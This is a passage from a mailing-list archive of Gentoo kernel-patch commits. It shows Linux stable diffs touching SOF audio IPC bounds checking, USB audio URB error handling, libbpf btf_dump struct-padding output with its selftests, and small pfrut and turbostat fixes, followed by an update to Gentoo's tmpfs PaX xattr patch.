++	size = PCI_BAR_SIZE;
+ 
+ 	dev_dbg(sdev->dev, "LPE PHY base at 0x%x size 0x%x", base, size);
+ 	sdev->bar[DSP_BAR] = devm_ioremap(sdev->dev, base, size);
+diff --git a/sound/soc/sof/ipc3.c b/sound/soc/sof/ipc3.c
+index b28af3a48b707..60b96b0c2412f 100644
+--- a/sound/soc/sof/ipc3.c
++++ b/sound/soc/sof/ipc3.c
+@@ -970,8 +970,9 @@ static void sof_ipc3_rx_msg(struct snd_sof_dev *sdev)
+ 		return;
+ 	}
+ 
+-	if (hdr.size < sizeof(hdr)) {
+-		dev_err(sdev->dev, "The received message size is invalid\n");
++	if (hdr.size < sizeof(hdr) || hdr.size > SOF_IPC_MSG_MAX_SIZE) {
++		dev_err(sdev->dev, "The received message size is invalid: %u\n",
++			hdr.size);
+ 		return;
+ 	}
+ 
+diff --git a/sound/soc/sof/ipc4-control.c b/sound/soc/sof/ipc4-control.c
+index 0d5a578c34962..7442ec1c5a4d4 100644
+--- a/sound/soc/sof/ipc4-control.c
++++ b/sound/soc/sof/ipc4-control.c
+@@ -84,7 +84,8 @@ sof_ipc4_set_volume_data(struct snd_sof_dev *sdev, struct snd_sof_widget *swidge
+ 		}
+ 
+ 		/* set curve type and duration from topology */
+-		data.curve_duration = gain->data.curve_duration;
++		data.curve_duration_l = gain->data.curve_duration_l;
++		data.curve_duration_h = gain->data.curve_duration_h;
+ 		data.curve_type = gain->data.curve_type;
+ 
+ 		msg->data_ptr = &data;
+diff --git a/sound/soc/sof/ipc4-topology.c b/sound/soc/sof/ipc4-topology.c
+index a81af5f73a4b4..49289932ba7e6 100644
+--- a/sound/soc/sof/ipc4-topology.c
++++ b/sound/soc/sof/ipc4-topology.c
+@@ -106,7 +106,7 @@ static const struct sof_topology_token gain_tokens[] = {
+ 		get_token_u32, offsetof(struct sof_ipc4_gain_data, curve_type)},
+ 	{SOF_TKN_GAIN_RAMP_DURATION,
+ 		SND_SOC_TPLG_TUPLE_TYPE_WORD, get_token_u32,
+-		offsetof(struct sof_ipc4_gain_data, curve_duration)},
++		offsetof(struct sof_ipc4_gain_data, curve_duration_l)},
+ 	{SOF_TKN_GAIN_VAL, SND_SOC_TPLG_TUPLE_TYPE_WORD,
+ 		get_token_u32, offsetof(struct sof_ipc4_gain_data, init_val)},
+ };
+@@ -154,7 +154,7 @@ static void sof_ipc4_dbg_audio_format(struct device *dev,
+ 	for (i = 0; i < num_format; i++, ptr = (u8 *)ptr + object_size) {
+ 		fmt = ptr;
+ 		dev_dbg(dev,
+-			" #%d: %uKHz, %ubit (ch_map %#x ch_cfg %u interleaving_style %u fmt_cfg %#x)\n",
++			" #%d: %uHz, %ubit (ch_map %#x ch_cfg %u interleaving_style %u fmt_cfg %#x)\n",
+ 			i, fmt->sampling_frequency, fmt->bit_depth, fmt->ch_map,
+ 			fmt->ch_cfg, fmt->interleaving_style, fmt->fmt_cfg);
+ 	}
+@@ -682,7 +682,7 @@ static int sof_ipc4_widget_setup_comp_pga(struct snd_sof_widget *swidget)
+ 
+ 	dev_dbg(scomp->dev,
+ 		"pga widget %s: ramp type: %d, ramp duration %d, initial gain value: %#x, cpc %d\n",
+-		swidget->widget->name, gain->data.curve_type, gain->data.curve_duration,
++		swidget->widget->name, gain->data.curve_type, gain->data.curve_duration_l,
+ 		gain->data.init_val, gain->base_config.cpc);
+ 
+ 	ret = sof_ipc4_widget_setup_msg(swidget, &gain->msg);
+diff --git a/sound/soc/sof/ipc4-topology.h b/sound/soc/sof/ipc4-topology.h
+index 2363a7cc0b57d..cf9d278524572 100644
+--- a/sound/soc/sof/ipc4-topology.h
++++ b/sound/soc/sof/ipc4-topology.h
+@@ -217,14 +217,16 @@ struct sof_ipc4_control_data {
+  * @init_val: Initial value
+  * @curve_type: Curve type
+  * @reserved: reserved for future use
+- * @curve_duration: Curve duration
++ * @curve_duration_l: Curve duration low part
++ * @curve_duration_h: Curve duration high part
+  */
+ struct sof_ipc4_gain_data {
+ 	uint32_t channels;
+ 	uint32_t init_val;
+ 	uint32_t curve_type;
+ 	uint32_t reserved;
+-	uint32_t curve_duration;
++	uint32_t curve_duration_l;
++	uint32_t curve_duration_h;
+ } __aligned(8);
+ 
+ /**
+diff --git a/sound/usb/endpoint.c b/sound/usb/endpoint.c
+index 419302e2057e8..647fa054d8b1d 100644
+--- a/sound/usb/endpoint.c
++++ b/sound/usb/endpoint.c
+@@ -455,8 +455,8 @@ static void push_back_to_ready_list(struct snd_usb_endpoint *ep,
+  * This function is used both for implicit feedback endpoints and in low-
+  * latency playback mode.
+  */
+-void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+-				       bool in_stream_lock)
++int snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
++				      bool in_stream_lock)
+ {
+ 	bool implicit_fb = snd_usb_endpoint_implicit_feedback_sink(ep);
+ 
+@@ -480,7 +480,7 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 		spin_unlock_irqrestore(&ep->lock, flags);
+ 
+ 		if (ctx == NULL)
+-			return;
++			break;
+ 
+ 		/* copy over the length information */
+ 		if (implicit_fb) {
+@@ -495,11 +495,14 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 			break;
+ 		if (err < 0) {
+ 			/* push back to ready list again for -EAGAIN */
+-			if (err == -EAGAIN)
++			if (err == -EAGAIN) {
+ 				push_back_to_ready_list(ep, ctx);
+-			else
++				break;
++			}
++
++			if (!in_stream_lock)
+ 				notify_xrun(ep);
+-			return;
++			return -EPIPE;
+ 		}
+ 
+ 		err = usb_submit_urb(ctx->urb, GFP_ATOMIC);
+@@ -507,13 +510,16 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 			usb_audio_err(ep->chip,
+ 				      "Unable to submit urb #%d: %d at %s\n",
+ 				      ctx->index, err, __func__);
+-			notify_xrun(ep);
+-			return;
++			if (!in_stream_lock)
++				notify_xrun(ep);
++			return -EPIPE;
+ 		}
+ 
+ 		set_bit(ctx->index, &ep->active_mask);
+ 		atomic_inc(&ep->submitted_urbs);
+ 	}
++
++	return 0;
+ }
+ 
+ /*
+diff --git a/sound/usb/endpoint.h b/sound/usb/endpoint.h
+index 924f4351588ce..c09f68ce08b18 100644
+--- a/sound/usb/endpoint.h
++++ b/sound/usb/endpoint.h
+@@ -52,7 +52,7 @@ int snd_usb_endpoint_implicit_feedback_sink(struct snd_usb_endpoint *ep);
+ int snd_usb_endpoint_next_packet_size(struct snd_usb_endpoint *ep,
+ 				      struct snd_urb_ctx *ctx, int idx,
+ 				      unsigned int avail);
+-void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+-				       bool in_stream_lock);
++int snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
++				      bool in_stream_lock);
+ 
+ #endif /* __USBAUDIO_ENDPOINT_H */
+diff --git a/sound/usb/format.c b/sound/usb/format.c
+index 405dc0bf6678c..4b1c5ba121f39 100644
+--- a/sound/usb/format.c
++++ b/sound/usb/format.c
+@@ -39,8 +39,12 @@ static u64 parse_audio_format_i_type(struct snd_usb_audio *chip,
+ 	case UAC_VERSION_1:
+ 	default: {
+ 		struct uac_format_type_i_discrete_descriptor *fmt = _fmt;
+-		if (format >= 64)
+-			return 0; /* invalid format */
++		if (format >= 64) {
++			usb_audio_info(chip,
++				       "%u:%d: invalid format type 0x%llx is detected, processed as PCM\n",
++				       fp->iface, fp->altsetting, format);
++			format = UAC_FORMAT_TYPE_I_PCM;
++		}
+ 		sample_width = fmt->bBitResolution;
+ 		sample_bytes = fmt->bSubframeSize;
+ 		format = 1ULL << format;
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index 2c5765cbed2d6..1e1d7458bce10 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -1595,7 +1595,7 @@ static int snd_usb_pcm_playback_ack(struct snd_pcm_substream *substream)
+ 	 * outputs here
+ 	 */
+ 	if (!ep->active_mask)
+-		snd_usb_queue_pending_output_urbs(ep, true);
++		return snd_usb_queue_pending_output_urbs(ep, true);
+ 	return 0;
+ }
+ 
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 0b470169729e6..56102711f395a 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -833,14 +833,9 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 				 const struct btf_type *t)
+ {
+ 	const struct btf_member *m;
+-	int align, i, bit_sz;
++	int max_align = 1, align, i, bit_sz;
+ 	__u16 vlen;
+ 
+-	align = btf__align_of(btf, id);
+-	/* size of a non-packed struct has to be a multiple of its alignment*/
+-	if (align && t->size % align)
+-		return true;
+-
+ 	m = btf_members(t);
+ 	vlen = btf_vlen(t);
+ 	/* all non-bitfield fields have to be naturally aligned */
+@@ -849,8 +844,11 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 		bit_sz = btf_member_bitfield_size(t, i);
+ 		if (align && bit_sz == 0 && m->offset % (8 * align) != 0)
+ 			return true;
++		max_align = max(align, max_align);
+ 	}
+-
++	/* size of a non-packed struct has to be a multiple of its alignment */
++	if (t->size % max_align != 0)
++		return true;
+ 	/*
+ 	 * if original struct was marked as packed, but its layout is
+ 	 * naturally aligned, we'll detect that it's not packed
+@@ -858,44 +856,97 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 	return false;
+ }
+ 
+-static int chip_away_bits(int total, int at_most)
+-{
+-	return total % at_most ? : at_most;
+-}
+-
+ static void btf_dump_emit_bit_padding(const struct btf_dump *d,
+-				      int cur_off, int m_off, int m_bit_sz,
+-				      int align, int lvl)
++				      int cur_off, int next_off, int next_align,
++				      bool in_bitfield, int lvl)
+ {
+-	int off_diff = m_off - cur_off;
+-	int ptr_bits = d->ptr_sz * 8;
++	const struct {
++		const char *name;
++		int bits;
++	} pads[] = {
++		{"long", d->ptr_sz * 8}, {"int", 32}, {"short", 16}, {"char", 8}
++	};
++	int new_off, pad_bits, bits, i;
++	const char *pad_type;
++
++	if (cur_off >= next_off)
++		return; /* no gap */
++
++	/* For filling out padding we want to take advantage of
++	 * natural alignment rules to minimize unnecessary explicit
++	 * padding. First, we find the largest type (among long, int,
++	 * short, or char) that can be used to force naturally aligned
++	 * boundary. Once determined, we'll use such type to fill in
++	 * the remaining padding gap. In some cases we can rely on
++	 * compiler filling some gaps, but sometimes we need to force
++	 * alignment to close natural alignment with markers like
++	 * `long: 0` (this is always the case for bitfields).  Note
++	 * that even if struct itself has, let's say 4-byte alignment
++	 * (i.e., it only uses up to int-aligned types), using `long:
++	 * X;` explicit padding doesn't actually change struct's
++	 * overall alignment requirements, but compiler does take into
++	 * account that type's (long, in this example) natural
++	 * alignment requirements when adding implicit padding. We use
++	 * this fact heavily and don't worry about ruining correct
++	 * struct alignment requirement.
++	 */
++	for (i = 0; i < ARRAY_SIZE(pads); i++) {
++		pad_bits = pads[i].bits;
++		pad_type = pads[i].name;
+ 
+-	if (off_diff <= 0)
+-		/* no gap */
+-		return;
+-	if (m_bit_sz == 0 && off_diff < align * 8)
+-		/* natural padding will take care of a gap */
+-		return;
++		new_off = roundup(cur_off, pad_bits);
++		if (new_off <= next_off)
++			break;
++	}
+ 
+-	while (off_diff > 0) {
+-		const char *pad_type;
+-		int pad_bits;
+-
+-		if (ptr_bits > 32 && off_diff > 32) {
+-			pad_type = "long";
+-			pad_bits = chip_away_bits(off_diff, ptr_bits);
+-		} else if (off_diff > 16) {
+-			pad_type = "int";
+-			pad_bits = chip_away_bits(off_diff, 32);
+-		} else if (off_diff > 8) {
+-			pad_type = "short";
+-			pad_bits = chip_away_bits(off_diff, 16);
+-		} else {
+-			pad_type = "char";
+-			pad_bits = chip_away_bits(off_diff, 8);
++	if (new_off > cur_off && new_off <= next_off) {
++		/* We need explicit `<type>: 0` aligning mark if next
++		 * field is right on alignment offset and its
++		 * alignment requirement is less strict than <type>'s
++		 * alignment (so compiler won't naturally align to the
++		 * offset we expect), or if subsequent `<type>: X`,
++		 * will actually completely fit in the remaining hole,
++		 * making compiler basically ignore `<type>: X`
++		 * completely.
++		 */
++		if (in_bitfield ||
++		    (new_off == next_off && roundup(cur_off, next_align * 8) != new_off) ||
++		    (new_off != next_off && next_off - new_off <= new_off - cur_off))
++			/* but for bitfields we'll emit explicit bit count */
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type,
++					in_bitfield ? new_off - cur_off : 0);
++		cur_off = new_off;
++	}
++
++	/* Now we know we start at naturally aligned offset for a chosen
++	 * padding type (long, int, short, or char), and so the rest is just
++	 * a straightforward filling of remaining padding gap with full
++	 * `<type>: sizeof(<type>);` markers, except for the last one, which
++	 * might need smaller than sizeof(<type>) padding.
++	 */
++	while (cur_off != next_off) {
++		bits = min(next_off - cur_off, pad_bits);
++		if (bits == pad_bits) {
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, pad_bits);
++			cur_off += bits;
++			continue;
++		}
++		/* For the remainder padding that doesn't cover entire
++		 * pad_type bit length, we pick the smallest necessary type.
++		 * This is pure aesthetics, we could have just used `long`,
++		 * but having smallest necessary one communicates better the
++		 * scale of the padding gap.
++		 */
++		for (i = ARRAY_SIZE(pads) - 1; i >= 0; i--) {
++			pad_type = pads[i].name;
++			pad_bits = pads[i].bits;
++			if (pad_bits < bits)
++				continue;
++
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, bits);
++			cur_off += bits;
++			break;
+ 		}
+-		btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, pad_bits);
+-		off_diff -= pad_bits;
+ 	}
+ }
+ 
+@@ -915,9 +966,11 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ {
+ 	const struct btf_member *m = btf_members(t);
+ 	bool is_struct = btf_is_struct(t);
+-	int align, i, packed, off = 0;
++	bool packed, prev_bitfield = false;
++	int align, i, off = 0;
+ 	__u16 vlen = btf_vlen(t);
+ 
++	align = btf__align_of(d->btf, id);
+ 	packed = is_struct ? btf_is_struct_packed(d->btf, id, t) : 0;
+ 
+ 	btf_dump_printf(d, "%s%s%s {",
+@@ -927,33 +980,36 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ 
+ 	for (i = 0; i < vlen; i++, m++) {
+ 		const char *fname;
+-		int m_off, m_sz;
++		int m_off, m_sz, m_align;
++		bool in_bitfield;
+ 
+ 		fname = btf_name_of(d, m->name_off);
+ 		m_sz = btf_member_bitfield_size(t, i);
+ 		m_off = btf_member_bit_offset(t, i);
+-		align = packed ? 1 : btf__align_of(d->btf, m->type);
++		m_align = packed ? 1 : btf__align_of(d->btf, m->type);
+ 
+-		btf_dump_emit_bit_padding(d, off, m_off, m_sz, align, lvl + 1);
++		in_bitfield = prev_bitfield && m_sz != 0;
++
++		btf_dump_emit_bit_padding(d, off, m_off, m_align, in_bitfield, lvl + 1);
+ 		btf_dump_printf(d, "\n%s", pfx(lvl + 1));
+ 		btf_dump_emit_type_decl(d, m->type, fname, lvl + 1);
+ 
+ 		if (m_sz) {
+ 			btf_dump_printf(d, ": %d", m_sz);
+ 			off = m_off + m_sz;
++			prev_bitfield = true;
+ 		} else {
+ 			m_sz = max((__s64)0, btf__resolve_size(d->btf, m->type));
+ 			off = m_off + m_sz * 8;
++			prev_bitfield = false;
+ 		}
++
+ 		btf_dump_printf(d, ";");
+ 	}
+ 
+ 	/* pad at the end, if necessary */
+-	if (is_struct) {
+-		align = packed ? 1 : btf__align_of(d->btf, id);
+-		btf_dump_emit_bit_padding(d, off, t->size * 8, 0, align,
+-					  lvl + 1);
+-	}
++	if (is_struct)
++		btf_dump_emit_bit_padding(d, off, t->size * 8, align, false, lvl + 1);
+ 
+ 	if (vlen)
+ 		btf_dump_printf(d, "\n");
+diff --git a/tools/power/acpi/tools/pfrut/pfrut.c b/tools/power/acpi/tools/pfrut/pfrut.c
+index 52aa0351533c3..388c9e3ad0407 100644
+--- a/tools/power/acpi/tools/pfrut/pfrut.c
++++ b/tools/power/acpi/tools/pfrut/pfrut.c
+@@ -97,7 +97,7 @@ static struct option long_options[] = {
+ static void parse_options(int argc, char **argv)
+ {
+ 	int option_index = 0;
+-	char *pathname;
++	char *pathname, *endptr;
+ 	int opt;
+ 
+ 	pathname = strdup(argv[0]);
+@@ -125,11 +125,23 @@ static void parse_options(int argc, char **argv)
+ 			log_getinfo = 1;
+ 			break;
+ 		case 'T':
+-			log_type = atoi(optarg);
++			log_type = strtol(optarg, &endptr, 0);
++			if (*endptr || (log_type != 0 && log_type != 1)) {
++				printf("Number expected: type(0:execution, 1:history) - Quit.\n");
++				exit(1);
++			}
++
+ 			set_log_type = 1;
+ 			break;
+ 		case 'L':
+-			log_level = atoi(optarg);
++			log_level = strtol(optarg, &endptr, 0);
++			if (*endptr ||
++			    (log_level != 0 && log_level != 1 &&
++			     log_level != 2 && log_level != 4)) {
++				printf("Number expected: level(0, 1, 2, 4) - Quit.\n");
++				exit(1);
++			}
++
+ 			set_log_level = 1;
+ 			break;
+ 		case 'R':
+diff --git a/tools/power/x86/turbostat/turbostat.8 b/tools/power/x86/turbostat/turbostat.8
+index c7b26a3603afe..3e1a4c4be001a 100644
+--- a/tools/power/x86/turbostat/turbostat.8
++++ b/tools/power/x86/turbostat/turbostat.8
+@@ -344,6 +344,8 @@ Alternatively, non-root users can be enabled to run turbostat this way:
+ 
+ # chmod +r /dev/cpu/*/msr
+ 
++# chmod +r /dev/cpu_dma_latency
++
+ .B "turbostat "
+ reads hardware counters, but doesn't write them.
+ So it will not interfere with the OS or other programs, including
+diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c
+index aba460410dbd1..c61c6c704fbe6 100644
+--- a/tools/power/x86/turbostat/turbostat.c
++++ b/tools/power/x86/turbostat/turbostat.c
+@@ -4426,7 +4426,7 @@ int print_hwp(struct thread_data *t, struct core_data *c, struct pkg_data *p)
+ 
+ 	fprintf(outf, "cpu%d: MSR_HWP_STATUS: 0x%08llx "
+ 		"(%sGuaranteed_Perf_Change, %sExcursion_Min)\n",
+-		cpu, msr, ((msr) & 0x1) ? "" : "No-", ((msr) & 0x2) ? "" : "No-");
++		cpu, msr, ((msr) & 0x1) ? "" : "No-", ((msr) & 0x4) ? "" : "No-");
+ 
+ 	return 0;
+ }
+@@ -5482,7 +5482,7 @@ void print_dev_latency(void)
+ 
+ 	retval = read(fd, (void *)&value, sizeof(int));
+ 	if (retval != sizeof(int)) {
+-		warn("read %s\n", path);
++		warn("read failed %s\n", path);
+ 		close(fd);
+ 		return;
+ 	}
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
+index e5560a6560309..e01690618e1ee 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
+@@ -53,7 +53,7 @@ struct bitfields_only_mixed_types {
+  */
+ /* ------ END-EXPECTED-OUTPUT ------ */
+ struct bitfield_mixed_with_others {
+-	long: 4; /* char is enough as a backing field */
++	char: 4; /* char is enough as a backing field */
+ 	int a: 4;
+ 	/* 8-bit implicit padding */
+ 	short b; /* combined with previous bitfield */
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
+index e304b6204bd9d..7998f27df7ddd 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
+@@ -58,7 +58,81 @@ union jump_code_union {
+ 	} __attribute__((packed));
+ };
+ 
+-/*------ END-EXPECTED-OUTPUT ------ */
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct nested_packed_but_aligned_struct {
++ *	int x1;
++ *	int x2;
++ *};
++ *
++ *struct outer_implicitly_packed_struct {
++ *	char y1;
++ *	struct nested_packed_but_aligned_struct y2;
++ *} __attribute__((packed));
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++struct nested_packed_but_aligned_struct {
++	int x1;
++	int x2;
++} __attribute__((packed));
++
++struct outer_implicitly_packed_struct {
++	char y1;
++	struct nested_packed_but_aligned_struct y2;
++};
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct usb_ss_ep_comp_descriptor {
++ *	char: 8;
++ *	char bDescriptorType;
++ *	char bMaxBurst;
++ *	short wBytesPerInterval;
++ *};
++ *
++ *struct usb_host_endpoint {
++ *	long: 64;
++ *	char: 8;
++ *	struct usb_ss_ep_comp_descriptor ss_ep_comp;
++ *	long: 0;
++ *} __attribute__((packed));
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++struct usb_ss_ep_comp_descriptor {
++	char: 8;
++	char bDescriptorType;
++	char bMaxBurst;
++	int: 0;
++	short wBytesPerInterval;
++} __attribute__((packed));
++
++struct usb_host_endpoint {
++	long: 64;
++	char: 8;
++	struct usb_ss_ep_comp_descriptor ss_ep_comp;
++	long: 0;
++};
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++struct nested_packed_struct {
++	int a;
++	char b;
++} __attribute__((packed));
++
++struct outer_nonpacked_struct {
++	short a;
++	struct nested_packed_struct b;
++};
++
++struct outer_packed_struct {
++	short a;
++	struct nested_packed_struct b;
++} __attribute__((packed));
++
++/* ------ END-EXPECTED-OUTPUT ------ */
+ 
+ int f(struct {
+ 	struct packed_trailing_space _1;
+@@ -69,6 +143,10 @@ int f(struct {
+ 	union union_is_never_packed _6;
+ 	union union_does_not_need_packing _7;
+ 	union jump_code_union _8;
++	struct outer_implicitly_packed_struct _9;
++	struct usb_host_endpoint _10;
++	struct outer_nonpacked_struct _11;
++	struct outer_packed_struct _12;
+ } *_)
+ {
+ 	return 0;
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
+index f2661c8d2d900..79276fbe454a8 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
+@@ -19,7 +19,7 @@ struct padded_implicitly {
+ /*
+  *struct padded_explicitly {
+  *	int a;
+- *	int: 32;
++ *	long: 0;
+  *	int b;
+  *};
+  *
+@@ -28,41 +28,28 @@ struct padded_implicitly {
+ 
+ struct padded_explicitly {
+ 	int a;
+-	int: 1; /* algo will explicitly pad with full 32 bits here */
++	int: 1; /* algo will emit aligning `long: 0;` here */
+ 	int b;
+ };
+ 
+ /* ----- START-EXPECTED-OUTPUT ----- */
+-/*
+- *struct padded_a_lot {
+- *	int a;
+- *	long: 32;
+- *	long: 64;
+- *	long: 64;
+- *	int b;
+- *};
+- *
+- */
+-/* ------ END-EXPECTED-OUTPUT ------ */
+-
+ struct padded_a_lot {
+ 	int a;
+-	/* 32 bit of implicit padding here, which algo will make explicit */
+ 	long: 64;
+ 	long: 64;
+ 	int b;
+ };
+ 
++/* ------ END-EXPECTED-OUTPUT ------ */
++
+ /* ----- START-EXPECTED-OUTPUT ----- */
+ /*
+  *struct padded_cache_line {
+  *	int a;
+- *	long: 32;
+  *	long: 64;
+  *	long: 64;
+  *	long: 64;
+  *	int b;
+- *	long: 32;
+  *	long: 64;
+  *	long: 64;
+  *	long: 64;
+@@ -85,7 +72,7 @@ struct padded_cache_line {
+  *struct zone {
+  *	int a;
+  *	short b;
+- *	short: 16;
++ *	long: 0;
+  *	struct zone_padding __pad__;
+  *};
+  *
+@@ -102,12 +89,160 @@ struct zone {
+ 	struct zone_padding __pad__;
+ };
+ 
++/* ----- START-EXPECTED-OUTPUT ----- */
++struct padding_wo_named_members {
++	long: 64;
++	long: 64;
++};
++
++struct padding_weird_1 {
++	int a;
++	long: 64;
++	short: 16;
++	short b;
++};
++
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct padding_weird_2 {
++ *	long: 56;
++ *	char a;
++ *	long: 56;
++ *	char b;
++ *	char: 8;
++ *};
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++struct padding_weird_2 {
++	int: 32;	/* these paddings will be collapsed into `long: 56;` */
++	short: 16;
++	char: 8;
++	char a;
++	int: 32;	/* these paddings will be collapsed into `long: 56;` */
++	short: 16;
++	char: 8;
++	char b;
++	char: 8;
++};
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++struct exact_1byte {
++	char x;
++};
++
++struct padded_1byte {
++	char: 8;
++};
++
++struct exact_2bytes {
++	short x;
++};
++
++struct padded_2bytes {
++	short: 16;
++};
++
++struct exact_4bytes {
++	int x;
++};
++
++struct padded_4bytes {
++	int: 32;
++};
++
++struct exact_8bytes {
++	long x;
++};
++
++struct padded_8bytes {
++	long: 64;
++};
++
++struct ff_periodic_effect {
++	int: 32;
++	short magnitude;
++	long: 0;
++	short phase;
++	long: 0;
++	int: 32;
++	int custom_len;
++	short *custom_data;
++};
++
++struct ib_wc {
++	long: 64;
++	long: 64;
++	int: 32;
++	int byte_len;
++	void *qp;
++	union {} ex;
++	long: 64;
++	int slid;
++	int wc_flags;
++	long: 64;
++	char smac[6];
++	long: 0;
++	char network_hdr_type;
++};
++
++struct acpi_object_method {
++	long: 64;
++	char: 8;
++	char type;
++	short reference_count;
++	char flags;
++	short: 0;
++	char: 8;
++	char sync_level;
++	long: 64;
++	void *node;
++	void *aml_start;
++	union {} dispatch;
++	long: 64;
++	int aml_length;
++};
++
++struct nested_unpacked {
++	int x;
++};
++
++struct nested_packed {
++	struct nested_unpacked a;
++	char c;
++} __attribute__((packed));
++
++struct outer_mixed_but_unpacked {
++	struct nested_packed b1;
++	short a1;
++	struct nested_packed b2;
++};
++
++/* ------ END-EXPECTED-OUTPUT ------ */
++
+ int f(struct {
+ 	struct padded_implicitly _1;
+ 	struct padded_explicitly _2;
+ 	struct padded_a_lot _3;
+ 	struct padded_cache_line _4;
+ 	struct zone _5;
++	struct padding_wo_named_members _6;
++	struct padding_weird_1 _7;
++	struct padding_weird_2 _8;
++	struct exact_1byte _100;
++	struct padded_1byte _101;
++	struct exact_2bytes _102;
++	struct padded_2bytes _103;
++	struct exact_4bytes _104;
++	struct padded_4bytes _105;
++	struct exact_8bytes _106;
++	struct padded_8bytes _107;
++	struct ff_periodic_effect _200;
++	struct ib_wc _201;
++	struct acpi_object_method _202;
++	struct outer_mixed_but_unpacked _203;
+ } *_)
+ {
+ 	return 0;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-30 20:52 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-30 20:52 UTC (permalink / raw
  To: gentoo-commits

commit:     62cea8d31c808e0c987542d8c03499614e657b30
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Mar 30 20:52:42 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Mar 30 20:52:42 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=62cea8d3

Update namespace user.pax.* on tmpfs patch

Bug: https://bugs.gentoo.org/show_bug.cgi?id=903513

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 1500_XATTR_USER_PREFIX.patch | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/1500_XATTR_USER_PREFIX.patch b/1500_XATTR_USER_PREFIX.patch
index fac3eed7..1d1a9301 100644
--- a/1500_XATTR_USER_PREFIX.patch
+++ b/1500_XATTR_USER_PREFIX.patch
@@ -26,12 +26,12 @@ the XATTR_PAX flags preserved.
 +#define XATTR_NAME_PAX_FLAGS XATTR_PAX_PREFIX XATTR_PAX_FLAGS_SUFFIX
  
  #endif /* _UAPI_LINUX_XATTR_H */
---- a/mm/shmem.c	2022-11-22 05:57:29.011626215 -0500
-+++ b/mm/shmem.c	2022-11-22 06:03:33.165939400 -0500
-@@ -3297,6 +3297,14 @@ static int shmem_xattr_handler_set(const
- 	struct shmem_inode_info *info = SHMEM_I(inode);
+--- a/mm/shmem.c	2023-03-29 18:54:52.431866914 -0400
++++ b/mm/shmem.c	2023-03-29 18:57:55.145689335 -0400
+@@ -3310,6 +3310,14 @@ static int shmem_xattr_handler_set(const
  	int err;
  
+ 	name = xattr_full_name(handler, name);
 +
 +	if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN)) {
 +		if (strcmp(name, XATTR_NAME_PAX_FLAGS))
@@ -40,10 +40,10 @@ the XATTR_PAX flags preserved.
 +			return -EINVAL;
 +	}
 +
- 	name = xattr_full_name(handler, name);
  	err = simple_xattr_set(&info->xattrs, name, value, size, flags, NULL);
  	if (!err) {
-@@ -3312,6 +3320,12 @@ static const struct xattr_handler shmem_
+ 		inode->i_ctime = current_time(inode);
+@@ -3324,6 +3332,12 @@ static const struct xattr_handler shmem_
  	.set = shmem_xattr_handler_set,
  };
  
@@ -56,7 +56,7 @@ the XATTR_PAX flags preserved.
  static const struct xattr_handler shmem_trusted_xattr_handler = {
  	.prefix = XATTR_TRUSTED_PREFIX,
  	.get = shmem_xattr_handler_get,
-@@ -3325,6 +3339,7 @@ static const struct xattr_handler *shmem
+@@ -3337,6 +3351,7 @@ static const struct xattr_handler *shmem
  #endif
  	&shmem_security_xattr_handler,
  	&shmem_trusted_xattr_handler,


